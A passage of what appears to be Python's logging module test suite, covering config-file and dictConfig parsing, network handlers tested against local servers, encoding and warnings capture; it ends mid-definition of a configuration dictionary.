self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# config2 contains a subtle error (a misspelt stream name), so applying it should raise.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# config3 contains a less subtle error (a reference to an undefined formatter), so applying it should raise.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
if threading:
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
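# Sketch (hypothetical helper, not used by the tests): SocketHandler frames each record as a
# 4-byte big-endian length prefix followed by a pickled dict of LogRecord attributes, which is
# exactly what SocketHandlerTest.handle_socket above reassembles chunk by chunk.
def _example_decode_socket_frame(data):
    # Unpack the length prefix, then rebuild a LogRecord from the pickled attribute dict.
    slen = struct.unpack('>L', data[:4])[0]
    attrs = pickle.loads(data[4:4 + slen])
    return logging.makeLogRecord(attrs)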
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # pack a dummy value just to get the size of the length prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls(('localhost', server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except Exception:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
#See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
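# Added note: the '.' key used in config14 above is dictConfig's "properties" syntax. After the
# handler is constructed, each entry in that sub-dict is set as an attribute on it (here `foo`
# and `terminator`), which is what test_config14_ok checks below.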
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
